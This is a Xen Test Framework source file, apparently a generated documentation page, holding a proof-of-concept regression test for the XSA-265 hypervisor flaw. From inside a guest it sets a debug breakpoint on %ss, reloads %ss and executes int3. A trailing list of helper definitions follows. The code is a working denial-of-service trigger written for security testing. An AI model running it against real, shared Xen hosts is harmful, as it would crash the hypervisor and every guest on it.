Xen Test Framework
main.c
21 #include <xtf.h>
22 
/* Title reported for this test: the XSA-265 regression check. */
const char test_title[] =
    "XSA-265 PoC";
24 
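/*
 * Regression check for XSA-265, run from inside a guest.
 *
 * The sequence arms a data breakpoint on the local copy of the %ss selector,
 * reloads %ss from that copy and immediately executes int3.  Reaching
 * xtf_success() means the hypervisor handled the resulting debug exception
 * without tripping its safety check.
 *
 * There is no explicit failure path: on a vulnerable hypervisor the check
 * trips and, per the comment further down, Xen does not stay alive.  The
 * absence of the success line is therefore the failure signal, which is
 * also why this belongs on a disposable test host only.
 */
void test_main(void)
{
    unsigned int ss = read_ss();
    /*
     * Breakpoint 0 described by mnemonics (L, G, RW, 32), plus the LE/GE
     * bits.  NOTE(review): presumably locally and globally enabled,
     * read/write, 4 bytes wide -- confirm against DR7_SYM in x86-dbg-reg.h.
     */
    unsigned long dr7 = DR7_SYM(0, L, G, RW, 32) | X86_DR7_LE | X86_DR7_GE;

    /* Latch the sticky General Detect flag in %dr6 */
    write_dr6(X86_DR6_BD);

    /* Data breakpoint for `ss`, working around Xen's %dr7 latching bug. */
    write_dr0(_u(&ss));
    write_dr7(dr7);
    write_dr7(dr7); /* Written twice on purpose: the latching workaround. */

    /*
     * The load of %ss reads the watched variable.  _ASM_TRAP_OK(1b) adds an
     * exception table entry so that a trap at label 1 is treated as
     * expected rather than as a test failure.
     */
    asm volatile ("mov %[ss], %%ss; int3; 1:"
                  _ASM_TRAP_OK(1b)
                  :: [ss] "m" (ss));

    /*
     * If Xen is still alive at this point, the erroneous safety check didn't
     * trip.
     */

    /* Disarm the breakpoint again, with the same double write as above. */
    write_dr7(0);
    write_dr7(0);

    xtf_success("Success: Not vulnerable to XSA-265\n");
}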
52 
53 /*
54  * Local variables:
55  * mode: C
56  * c-file-style: "BSD"
57  * c-basic-offset: 4
58  * tab-width: 4
59  * indent-tabs-mode: nil
60  * End:
61  */
#define X86_DR6_BD
Definition: x86-dbg-reg.h:19
#define _u(v)
Express an arbitrary value v as unsigned long.
Definition: numbers.h:53
static void write_dr6(unsigned long val)
Definition: x86-dbg-reg.h:167
static void write_dr7(unsigned long val)
Definition: x86-dbg-reg.h:181
void xtf_success(const char *fmt,...)
Report test success.
Definition: report.c:38
void test_main(void)
To be implemented by each test, as its entry point.
Definition: main.c:137
#define _ASM_TRAP_OK(loc)
Create an exception table entry, whitelisting a trap as being ok at loc.
Definition: extable.h:57
#define DR7_SYM(bp,...)
Create a partial %dr7 setting for a particular breakpoint based on mnemonics.
Definition: x86-dbg-reg.h:100
const char test_title[]
The title of the test.
Definition: main.c:14
#define X86_DR7_LE
Definition: x86-dbg-reg.h:29
#define X86_DR7_GE
Definition: x86-dbg-reg.h:30
static void write_dr0(unsigned long linear)
Definition: x86-dbg-reg.h:111
static unsigned int read_ss(void)
Definition: lib.h:169